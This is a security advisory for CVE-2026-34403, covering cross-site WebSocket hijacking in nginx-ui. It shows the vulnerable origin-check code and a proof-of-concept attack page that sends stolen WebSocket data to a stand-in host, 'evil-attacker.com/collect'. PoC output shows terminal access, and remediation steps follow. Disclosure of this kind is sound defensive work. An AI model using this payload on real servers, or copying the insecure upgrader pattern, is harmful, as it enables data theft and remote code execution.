GHSA-78MF-482W-62QJ
Vulnerability from github – Published: 2026-04-21 15:13 – Updated: 2026-04-21 15:13
VLAI?
Summary
Nginx-UI: Cross-Site WebSocket Hijacking (CSWSH) via missing origin validation on all WebSocket endpoints
Details
Summary
All WebSocket endpoints in nginx-ui use a gorilla/websocket Upgrader with CheckOrigin unconditionally returning true, allowing Cross-Site WebSocket Hijacking (CSWSH). Combined with the fact that authentication tokens are stored in browser cookies (set via JavaScript without HttpOnly or explicit SameSite attributes), a malicious webpage can establish authenticated WebSocket connections to the nginx-ui instance when a logged-in administrator visits the attacker-controlled page.
Details
Vulnerable Code Pattern
Every WebSocket endpoint in the codebase uses the same unsafe upgrader configuration:
// Found in: api/terminal/pty.go, api/analytic/analytic.go, api/event/websocket.go,
// api/nginx_log/websocket.go, api/upstream/upstream.go, api/cluster/websocket.go,
// api/nginx/websocket.go, api/certificate/revoke.go, api/sites/websocket.go,
// api/llm/llm.go, api/llm/code_completion.go, api/system/upgrade.go
var upgrader = websocket.Upgrader{
CheckOrigin: func(r *http.Request) bool {
return true // Accepts ALL origins
},
}
Cookie-Based Authentication
The Vue.js frontend stores JWT tokens as cookies without security attributes (app/src/pinia/moudule/user.ts):
watch(token, v => {
cookies.set('token', v, { maxAge: 86400 }) // No HttpOnly, no SameSite
})
The backend middleware accepts tokens from cookies (internal/middleware/middleware.go):
func getToken(c *gin.Context) (token string) {
// ...
if token, _ = c.Cookie("token"); token != "" {
return token
}
return ""
}
Affected Endpoints
All WebSocket endpoints under the authenticated router group are vulnerable:
| Endpoint | Impact |
|---|---|
| /api/nginx/detail_status/ws | Leak nginx performance metrics and configuration |
| /api/events | Leak system processing events |
| /api/analytic/intro | Leak CPU, memory, disk, network statistics |
| /api/nginx_log | Read nginx log files (access/error logs) |
| /api/pty | Interactive terminal access (RCE if OTP not enabled) |
| /api/upgrade/perform | Trigger system binary upgrade |
| /api/cluster/nodes/enabled | Leak and manipulate cluster node data |
PoC
Environment Setup
services:
nginx-ui:
image: uozi/nginx-ui:latest
ports:
- "9000:80"
volumes:
- nginx-ui-config:/etc/nginx-ui
volumes:
nginx-ui-config:
Attack Page (hosted on attacker-controlled domain)
<script>
// Attacker page at http://evil-attacker.com
// Victim must be logged into nginx-ui
const ws = new WebSocket('ws://TARGET_NGINX_UI:9000/api/nginx/detail_status/ws');
ws.onopen = () => console.log('CSWSH: Connected from malicious origin!');
ws.onmessage = (e) => {
console.log('Stolen data:', e.data);
fetch('https://evil-attacker.com/collect', {method:'POST', body: e.data});
};
</script>
Automated PoC Results
[+] VULNERABLE! WebSocket connected from http://evil-attacker.com
[+] Received: {"stub_status_enabled":false,"running":true,"info":{"active":0,...}}
[+] VULNERABLE! Event stream from http://evil-attacker.com
[+] Received: {"event":"processing_status","data":{"index_scanning":false,...}}
[+] VULNERABLE! Analytics from http://evil-attacker.com
[+] Received: {"avg_load":{"load1":0.1,"load5":0.2},"cpu_percent":0.08,...}
[+] CRITICAL: Terminal connected from http://evil-attacker.com!
[+] Terminal output: 'eae7a76e3ef4 login: '
[*] Sent username: root
[+] Output: 'Password: '
[+] Control test (no auth): Correctly rejected with HTTP 403
Impact
An attacker can create a malicious webpage that, when visited by an authenticated nginx-ui administrator, silently:
- Steals sensitive server information -- nginx configuration, performance metrics, CPU/memory/disk usage, network traffic statistics, and system events
- Reads nginx log files -- potentially containing sensitive request data, IP addresses, and authentication tokens
- Gains interactive terminal access -- if the administrator has not enabled OTP/2FA, the attacker obtains a full PTY shell on the server, achieving Remote Code Execution
- Triggers system operations -- including nginx reload/restart and binary upgrades
The attack requires no privileges and no knowledge of the victim's credentials. The only user interaction needed is visiting a webpage.
Remediation
- Implement proper origin validation in all WebSocket upgraders:
var upgrader = websocket.Upgrader{
CheckOrigin: func(r *http.Request) bool {
origin := r.Header.Get("Origin")
return isAllowedOrigin(origin)
},
}
- Set secure cookie attributes:
cookies.set('token', v, { maxAge: 86400, sameSite: 'strict', secure: true })
- Add CSRF token validation to WebSocket upgrade requests as defense-in-depth.
A patch is available at https://github.com/0xJacky/nginx-ui/releases/tag/v2.3.5
Severity ?
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/0xJacky/Nginx-UI"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.9.10-0.20260316053337-1a9cd29a3082"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-34403"
],
"database_specific": {
"cwe_ids": [
"CWE-1385",
"CWE-352"
],
"github_reviewed": true,
"github_reviewed_at": "2026-04-21T15:13:01Z",
"nvd_published_at": "2026-04-20T21:16:36Z",
"severity": "HIGH"
},
"details": "## Summary\n\nAll WebSocket endpoints in nginx-ui use a gorilla/websocket Upgrader with CheckOrigin unconditionally returning true, allowing Cross-Site WebSocket Hijacking (CSWSH). Combined with the fact that authentication tokens are stored in browser cookies (set via JavaScript without HttpOnly or explicit SameSite attributes), a malicious webpage can establish authenticated WebSocket connections to the nginx-ui instance when a logged-in administrator visits the attacker-controlled page.\n\n## Details\n\n### Vulnerable Code Pattern\n\nEvery WebSocket endpoint in the codebase uses the same unsafe upgrader configuration:\n\n```go\n// Found in: api/terminal/pty.go, api/analytic/analytic.go, api/event/websocket.go,\n// api/nginx_log/websocket.go, api/upstream/upstream.go, api/cluster/websocket.go,\n// api/nginx/websocket.go, api/certificate/revoke.go, api/sites/websocket.go,\n// api/llm/llm.go, api/llm/code_completion.go, api/system/upgrade.go\nvar upgrader = websocket.Upgrader{\n CheckOrigin: func(r *http.Request) bool {\n return true // Accepts ALL origins\n },\n}\n```\n\n### Cookie-Based Authentication\n\nThe Vue.js frontend stores JWT tokens as cookies without security attributes (app/src/pinia/moudule/user.ts):\n\n```typescript\nwatch(token, v =\u003e {\n cookies.set(\u0027token\u0027, v, { maxAge: 86400 }) // No HttpOnly, no SameSite\n})\n```\n\nThe backend middleware accepts tokens from cookies (internal/middleware/middleware.go):\n\n```go\nfunc getToken(c *gin.Context) (token string) {\n // ...\n if token, _ = c.Cookie(\"token\"); token != \"\" {\n return token\n }\n return \"\"\n}\n```\n\n### Affected Endpoints\n\nAll WebSocket endpoints under the authenticated router group are vulnerable:\n\n| Endpoint | Impact |\n|---|---|\n| /api/nginx/detail_status/ws | Leak nginx performance metrics and configuration |\n| /api/events | Leak system processing events |\n| /api/analytic/intro | Leak CPU, memory, disk, network statistics |\n| /api/nginx_log | Read nginx log files (access/error logs) |\n| /api/pty | Interactive terminal access (RCE if OTP not enabled) |\n| /api/upgrade/perform | Trigger system binary upgrade |\n| /api/cluster/nodes/enabled | Leak and manipulate cluster node data |\n\n## PoC\n\n### Environment Setup\n\n```yaml\nservices:\n nginx-ui:\n image: uozi/nginx-ui:latest\n ports:\n - \"9000:80\"\n volumes:\n - nginx-ui-config:/etc/nginx-ui\nvolumes:\n nginx-ui-config:\n```\n\n### Attack Page (hosted on attacker-controlled domain)\n\n```html\n\u003cscript\u003e\n// Attacker page at http://evil-attacker.com\n// Victim must be logged into nginx-ui\nconst ws = new WebSocket(\u0027ws://TARGET_NGINX_UI:9000/api/nginx/detail_status/ws\u0027);\nws.onopen = () =\u003e console.log(\u0027CSWSH: Connected from malicious origin!\u0027);\nws.onmessage = (e) =\u003e {\n console.log(\u0027Stolen data:\u0027, e.data);\n fetch(\u0027https://evil-attacker.com/collect\u0027, {method:\u0027POST\u0027, body: e.data});\n};\n\u003c/script\u003e\n```\n\n### Automated PoC Results\n\n```\n[+] VULNERABLE! WebSocket connected from http://evil-attacker.com\n[+] Received: {\"stub_status_enabled\":false,\"running\":true,\"info\":{\"active\":0,...}}\n\n[+] VULNERABLE! Event stream from http://evil-attacker.com\n[+] Received: {\"event\":\"processing_status\",\"data\":{\"index_scanning\":false,...}}\n\n[+] VULNERABLE! Analytics from http://evil-attacker.com\n[+] Received: {\"avg_load\":{\"load1\":0.1,\"load5\":0.2},\"cpu_percent\":0.08,...}\n\n[+] CRITICAL: Terminal connected from http://evil-attacker.com!\n[+] Terminal output: \u0027eae7a76e3ef4 login: \u0027\n[*] Sent username: root\n[+] Output: \u0027Password: \u0027\n\n[+] Control test (no auth): Correctly rejected with HTTP 403\n```\n\n## Impact\n\nAn attacker can create a malicious webpage that, when visited by an authenticated nginx-ui administrator, silently:\n\n1. **Steals sensitive server information** -- nginx configuration, performance metrics, CPU/memory/disk usage, network traffic statistics, and system events\n2. **Reads nginx log files** -- potentially containing sensitive request data, IP addresses, and authentication tokens\n3. **Gains interactive terminal access** -- if the administrator has not enabled OTP/2FA, the attacker obtains a full PTY shell on the server, achieving Remote Code Execution\n4. **Triggers system operations** -- including nginx reload/restart and binary upgrades\n\nThe attack requires no privileges and no knowledge of the victim\u0027s credentials. The only user interaction needed is visiting a webpage.\n\n## Remediation\n\n1. Implement proper origin validation in all WebSocket upgraders:\n\n```go\nvar upgrader = websocket.Upgrader{\n CheckOrigin: func(r *http.Request) bool {\n origin := r.Header.Get(\"Origin\")\n return isAllowedOrigin(origin)\n },\n}\n```\n\n2. Set secure cookie attributes:\n```typescript\ncookies.set(\u0027token\u0027, v, { maxAge: 86400, sameSite: \u0027strict\u0027, secure: true })\n```\n\n3. Add CSRF token validation to WebSocket upgrade requests as defense-in-depth.\n\nA patch is available at https://github.com/0xJacky/nginx-ui/releases/tag/v2.3.5",
"id": "GHSA-78mf-482w-62qj",
"modified": "2026-04-21T15:13:01Z",
"published": "2026-04-21T15:13:01Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/0xJacky/nginx-ui/security/advisories/GHSA-78mf-482w-62qj"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34403"
},
{
"type": "PACKAGE",
"url": "https://github.com/0xJacky/nginx-ui"
},
{
"type": "WEB",
"url": "https://github.com/0xJacky/nginx-ui/releases/tag/v2.3.5"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L",
"type": "CVSS_V4"
}
],
"summary": "Nginx-UI: Cross-Site WebSocket Hijacking (CSWSH) via missing origin validation on all WebSocket endpoints"
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…